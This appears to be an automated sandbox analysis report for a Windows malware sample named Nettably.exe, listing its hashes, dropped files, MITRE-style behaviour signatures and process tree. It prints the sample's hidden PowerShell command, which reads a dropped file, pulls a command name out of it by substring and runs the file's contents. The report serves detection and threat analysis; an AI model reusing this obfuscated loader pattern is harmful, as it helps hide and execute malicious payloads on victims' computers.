Analysis
-
max time kernel
129s -
max time network
102s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
29/08/2024, 11:15
Static task
static1
Behavioral task
behavioral1
Sample
Nettably.exe
Resource
win7-20240704-en
General
-
Target
Nettably.exe
-
Size
698KB
-
MD5
0815e4fcd9b75660891ec15ce119fa70
-
SHA1
7f8c1c73194725dce424b72ff2306203f3590c3b
-
SHA256
89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b
-
SHA512
c613b96c177294bbbfce2e0b86d15f32d2c7c579bf4c50ef0940ae697e7cfa0f36512ff7fa221c2a5b6963ca6b000b34876707bdc56351c20d20a3ee54fa68ba
-
SSDEEP
12288:67MJHZFQpHB5LOBTCUbINBoQYwXsCGJt5aFp0zS6w+CAG0snsQc:6IJHoph5CBTCUUN6QYwZrH6VfAsQc
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4760 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\legionrernes.Bac Nettably.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\underskridelser.ini Nettably.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Fonts\battable.ini Nettably.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4776 4760 WerFault.exe 87 -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Nettably.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4760 powershell.exe 4760 powershell.exe 4760 powershell.exe 4760 powershell.exe 4760 powershell.exe 4760 powershell.exe 4760 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4760 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3852 wrote to memory of 4760 3852 Nettably.exe 87 PID 3852 wrote to memory of 4760 3852 Nettably.exe 87 PID 3852 wrote to memory of 4760 3852 Nettably.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\Nettably.exe"C:\Users\Admin\AppData\Local\Temp\Nettably.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Kludgy=Get-Content 'C:\Users\Admin\AppData\Local\errancies\Tansies.Tem';$Crushes53=$Kludgy.SubString(52844,3);.$Crushes53($Kludgy)2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4760 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 27963⤵
- Program crash
PID:4776
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4760 -ip 47601⤵PID:4480
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
51KB
MD55d38b5b5dd9df5889a8cdae91bda8ce0
SHA155d4f7428bfc7a1c572e2f65d2877f53dfe9b00c
SHA25645c83c93a697679fb2f35ba68b3df5393398970f0adbda0f8af697080a661a07
SHA5129632d65d07e63235746f60133dfeaad9474db92a70d2264300d3f433399b0ca0e647120d3393d07e5f722597ec1e14a4111f9b0819886cb11f646d75c1e6be8d